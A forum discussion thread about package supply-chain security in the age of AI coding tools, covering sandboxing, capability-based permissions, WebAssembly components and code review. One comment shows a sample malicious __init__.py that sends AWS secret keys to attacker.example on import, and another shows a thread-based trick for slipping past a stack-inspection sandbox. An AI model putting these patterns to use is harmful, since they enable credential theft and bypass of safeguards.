
This is a real problem, and AI is a new vector for it, but the root cause is the lack of reliable trust and security around packages in general.

I really wonder what the solution is.

Has there been any work on limiting the permissions of modules? E.g. by default a third-party module can't access disk or network or various system calls or shell functions or use tools like Python's "inspect" to access data outside what is passed to them? Unless you explicitly pass permissions in your import statement or something?
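Something like this hypothetical API, maybe (nothing like it exists in Python today; every name here is made up):

    # Hypothetical sketch only -- "sandbox" and "grant" do not exist.
    # Idea: third-party imports are deny-by-default, and you opt in to
    # specific capabilities at the import site.
    import importlib
    from sandbox import grant  # made-up module and function

    requests = grant(
        importlib.import_module("requests"),
        network=["api.example.com:443"],  # only this host/port
        filesystem=False,                 # no disk access
        subprocess=False,                 # no shelling out
    )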



You may be interested in WebAssembly Components: https://component-model.bytecodealliance.org/.

Components can't do any IO or interfere with any other components in an application except through interfaces explicitly given to them. So you could, e.g., have a semi-untrusted image compression component composed with the rest of your app, and not have to worry that it's going to exfiltrate user data.
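From the host side it looks roughly like this with the wasmtime Python bindings (this sketch uses a core WASI module rather than the component model proper, and API details may vary by version):

    from wasmtime import Engine, Store, Module, Linker, WasiConfig

    engine = Engine()
    store = Store(engine)

    # Deny-by-default WASI context: no preopened directories, no env
    # vars, no args. The guest can compute, but it cannot reach out.
    store.set_wasi(WasiConfig())

    linker = Linker(engine)
    linker.define_wasi()

    # "compress.wasm" stands in for the semi-untrusted component.
    module = Module.from_file(engine, "compress.wasm")
    instance = linker.instantiate(store, module)
    compress = instance.exports(store)["compress"]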


So you refuse to learn from history, because that's basically the UNIX model: you string together simple text-processing programs, and any misbehaving program gets a SIGSEGV without endangering anything else, so you don't have to worry. But it transpired that:

1. splitting functionality that way is not always possible or effective/performant, not to mention that operators in practice tend to find fine-grained access control super annoying

2. and more importantly, even if the architecture is working, hostile garbage in your pipeline WILL cause problems for the rest of your app.


It doesn't seem like a stretch that an LLM will very soon be able to configure your dependent WebAssembly components to permit dangerous access. It feels like this model of security, while definitely a step in the right direction, won't make a novice vibe coder any more secure.


It seems like it would be rare, though.

An LLM might hallucinate the wrong permissions, but they're going to be plausible guesses.

It's extremely unlikely to hallucinate full network access for a module that has nothing to do with networking.


I'm saying no hallucination will be happening.

The LLM will happily write code that permits network access, because it read an example online that did that. And, unless you know better, you won't know to manually turn that off.

Sandboxed WebAssembly Components don't solve anything if your LLM thinks it's helping when it lets the drawbridge down for the orcs.


That's a separate conversation then, because there's wrong information everywhere, but LLMs still do mostly OK. They don't just regurgitate stuff blindly; they look for patterns.

And the article here is specifically about hallucinations: the model trying to plausibly fill something in according to a pattern.

Wrong information on the internet is as old as the internet...


Wrong code on the Internet does not steal your credit card information. Wrong code on localhost does.

But, I think we agree, anyway.


Java used to have the Java Security Manager, which basically made it possible to set permissions for what a jar/dependency could do. But it's deprecated, with no really good alternative anymore.


Java could have really nice security if it provided access to the OS API via interfaces, with the main function receiving the interface to the real implementation. It would then be possible to implement really tight sandboxes. But that ship sailed 30 years ago…


My crank opinion is that we should invest in capability-based security, or an effects system, for code in general, both internal and external. Your external package can't pwn you if you have to explicitly grant it permissions it shouldn't have.
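As a toy Python sketch of the discipline (real capability systems enforce this at the language or runtime level, not by convention):

    import socket

    class NetCap:
        """Holding this object IS the permission to use the network."""
        def __init__(self, allowed_hosts):
            self.allowed_hosts = set(allowed_hosts)

        def connect(self, host, port):
            if host not in self.allowed_hosts:
                raise PermissionError(f"no capability for {host}")
            return socket.create_connection((host, port))

    # This function never receives a NetCap, so it cannot do network IO.
    def render_markdown(text: str) -> str:
        ...

    # This one can, but only to the hosts you explicitly granted.
    def fetch_feed(net: NetCap) -> bytes:
        conn = net.connect("feeds.example.com", 443)
        ...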


I wonder how you could retrofit something like that onto Go, for instance. I've always thought a buried package init function could be devastating. Allow/deny-listing syscalls, sockets, files, etc. per package could be interesting.


Most languages have that early-init problem. C++ allows global constructors, Java has class statics, and Rust can also initialize things globally.

Even C allows library initializers that run arbitrary code. That was used to implement the attack against ssh via the malicious xz library.

Disabling globals that are not compile-time constants, or at least never initializing them unless the application explicitly asks for it, would nicely address that issue. But language designers think that running arbitrary code before main is a must.
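Python, the ecosystem the article is mostly about, is no different: top-level code in __init__.py runs the moment the package is imported. An illustrative (made-up) malicious example:

    # evil_pkg/__init__.py -- runs on `import evil_pkg`, before any of
    # your own code gets a say. Domain and payload are illustrative.
    import os
    import urllib.request

    urllib.request.urlopen(
        "https://attacker.example/exfil?k="
        + os.environ.get("AWS_SECRET_ACCESS_KEY", "")
    )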


Rust doesn't have static initialisers for complex objects; it has lazy initialisers in the standard library that run when they're first requested, but there's no way to statically initialise any object more complex than a primitive: https://doc.rust-lang.org/reference/items/static-items.html#...


Thanks, I stand corrected. Rust does not allow initializing globals with arbitrary code that runs before main, even with unsafe.

One more point to consider Rust over C++.


> This is a real problem, and AI is a new vector for it, but the root cause is the lack of reliable trust and security around packages in general.

I agree. And the problem has intensified due to the explosion of dependencies.

> Has there been any work on limiting the permissions of modules?

With respect to PyPI, npm, and the like, and as far as I know: no. But regarding C, and generally things you can control relatively easily yourself, see for instance:

https://hn.algolia.com/?dateRange=all&page=0&prefix=true&que...


It would be useful to have different levels of restrictions for various modules within a single process, which I don’t think pledge can do.


I don't think it's a bad idea, but currently packages aren't written with adversarial packages in mind. E.g., requests in Python should have network access, but probably not when it's called from a sandboxed package; and you might be able to trick certain packages into calling functions for you without having your package in the call stack (e.g. via the asyncio event loop or a Thread), as the sketch below shows. I think any serious attempt would get pushback from library authors.
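A toy illustration of the call-stack problem (the stack-walking check is made up, but the evasion pattern is real):

    import inspect
    import threading

    def stack_allows_network() -> bool:
        # Naive sandbox: deny if any calling frame comes from a file
        # belonging to an untrusted package.
        return not any("untrusted_pkg" in f.filename
                       for f in inspect.stack())

    def do_privileged_thing():
        assert stack_allows_network()
        ...  # e.g. open a socket

    # Untrusted code launders the call through a fresh thread: the new
    # thread's stack never contains an untrusted_pkg frame.
    t = threading.Thread(target=do_privileged_thing)
    t.start()
    t.join()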

Also, it's hard to argue against hard process isolation. Spectre et al. are much easier to defend against at process boundaries. It's probably higher value to make it easier to put submodules into their own sandboxed processes.


> It would be useful to have different levels of restrictions for various modules within a single process, which I don’t think pledge can do.

Sure: the idea could be improved a lot. And then there is the maintenance burden. Here, perhaps a step forward would be for every package author to provide a "pledge" (or whatever you want to call the idea) instead of others trying to figure out what capabilities are needed. Then you could also audit whether a "pledge" holds in reality.
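Concretely, the pledge could just be a declared manifest that the index and CI tooling audit. A hypothetical format (nothing like this is standardized for PyPI/npm today):

    # Hypothetical pledge, shipped alongside the package metadata.
    PLEDGE = {
        "network": False,
        "filesystem": ["read:./templates"],  # read-only, one directory
        "subprocess": False,
        "env_vars": [],
    }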


We do have tools, but adoption is sparse. It's still too much hassle.

You can do SLSA, SBOM and package attestation with confirmed provenance.

But as mentioned, it's still some work, though more tools keep popping up.

The downside: you can have a signed, attested package that still turns malicious, just like malware creators who signed their stuff with Microsoft's help.


How about building tokenizers that use hashed identifiers rather than treating identifiers as plain English?

e.g, "NullPointerException" can be a single kanji. Current LLM processes it like "N, "ull", "P", "oint", er", "Excep", "tion". This lets them make up "PullDrawerException", which is only useful outside code.

That kind of creativity is not useful in code, where identifiers are just friendly names for pointer addresses.

I guess the real question is how much business sense such a solution would make. "The S in $buzzword stands for security" kind of thing.
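A minimal preprocessing sketch of the idea, using Python's tokenize module to map every identifier to one opaque surrogate (the ID_ scheme is made up):

    import hashlib
    import io
    import keyword
    import tokenize

    def hash_identifiers(src: str) -> str:
        """Replace each identifier with a stable opaque surrogate."""
        out = []
        for tok in tokenize.generate_tokens(io.StringIO(src).readline):
            if tok.type == tokenize.NAME and not keyword.iskeyword(tok.string):
                digest = hashlib.blake2s(tok.string.encode(),
                                         digest_size=4).hexdigest()
                out.append((tokenize.NAME, f"ID_{digest}"))
            else:
                out.append((tok.type, tok.string))
        return tokenize.untokenize(out)

    print(hash_identifiers("raise NullPointerException(msg)"))
    # roughly: raise ID_... (ID_... )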


Why not train an LAM, a Large AST Model?


That will miss comments and documentation.
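Python's own ast module, for instance, drops them entirely:

    import ast

    # The comment is gone from the tree:
    print(ast.dump(ast.parse("x = 1  # business-critical context")))
    # roughly: Module(body=[Assign(targets=[Name(id='x', ctx=Store())],
    #                              value=Constant(value=1))], ...)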


If that were true of AST implementations, then "prettier"-esque tooling wouldn't exist. https://github.com/prettier/prettier/blob/3.5.3/src/main/com...


It's deeper than the security issue.

You could have two different packages in a build doing similar things -- one uses less memory but is slower to compute than the other -- so they're used selectively by scenario, based on previous experience in production.

If someone unfamiliar with the build makes a change and the assistant swaps the package used in the change -- which goes unnoticed because the package itself is already visible and the naming is only slightly different -- it's easy to see how surprises can happen.

(I've seen o3 do this every time the prompt was re-run in this situation)


The solution is social code review: don't use modules that haven't been reviewed by at least N people you trust.

https://github.com/crev-dev/


In Smolagents you can specify which packages are permitted. Maybe that's a shortcut to enforcing this? I can't imagine that in a professional development house it's truly an n x m problem over all possible libraries.
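From memory of the smolagents docs (treat as approximate; class and parameter names have shifted across versions), it's an allow-list on the code agent:

    from smolagents import CodeAgent, InferenceClientModel

    agent = CodeAgent(
        tools=[],
        model=InferenceClientModel(),
        # Generated code may only import from this allow-list; the
        # executor rejects everything else.
        additional_authorized_imports=["math", "json"],
    )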



